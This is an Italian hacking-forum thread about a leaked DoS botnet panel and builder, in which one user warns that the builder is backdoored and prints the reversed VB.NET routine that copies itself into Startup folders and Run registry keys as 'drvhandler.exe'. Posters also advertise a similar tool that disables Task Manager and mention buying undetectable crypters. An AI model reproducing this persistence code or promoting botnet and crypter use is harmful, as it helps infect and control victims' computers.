DoS Blue Botnet | Download | Webpanel + Builder | LEAKED

Stato
Discussione chiusa ad ulteriori risposte.

JollyBrian

Utente Jade
31 Dicembre 2010
1,492
103
225
684
Ultima modifica:
EDIT. Non pubblicherò altre release in quanto sul web è pieno di bambini.
 
Ultima modifica:
Credo che il mio programma, yAtcker sia quasi simile a questa, però con funzioni in più: Disable TaskManager/Copy on autorun/ICO.
Vi lascio provare.
Edit:
Vi sconsiglio di usare il builder, l'ho reversato e all'avvio del form principale viene chiamata una routine:
Codice:
Public Sub setOnStartup()
    Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True)
    Dim flag As Boolean = False
    Try
        File.Copy(Assembly.GetExecutingAssembly.Location, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\drvhandler.exe")
        flag = True
    Catch obj1 As Object
    End Try
    Try
        File.Copy(Assembly.GetExecutingAssembly.Location, "C:\ProgramData\Microsoft\Windows\Menu Start\Programmi\Esecuzione Automatica\drvhandler.exe")
        flag = True
    Catch obj2 As Object
    End Try
    If Not flag Then
        Try
            File.Copy(Assembly.GetExecutingAssembly.Location, Path.Combine(Environment.GetFolderPath(SpecialFolder.ApplicationData), "drvhandler.exe"))
            Try
                key.SetValue("sysDrvHandler", Path.Combine(Environment.GetFolderPath(SpecialFolder.ApplicationData), "drvhandler.exe"))
            Catch obj3 As Object
                Try
                    Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\LocalMachine\Run", True).SetValue("sysDrvHandler", Path.Combine(Environment.GetFolderPath(SpecialFolder.ApplicationData), "drvhandler.exe"))
                Catch obj4 As Object
                End Try
            End Try
        Catch obj5 As Object
        End Try
    End If
End Sub

Perchè usare questa "BotNet Control", se invece ne ho fatta già una "automatica"?
 
E mi raccomando ragazzi... non scaricatela. Un crypter FUD al giorno d'oggi è semplice da comprare...
Potrebbe essere un file infetto, io l'ho aperto da macchina virtuale :)
 
Stato
Discussione chiusa ad ulteriori risposte.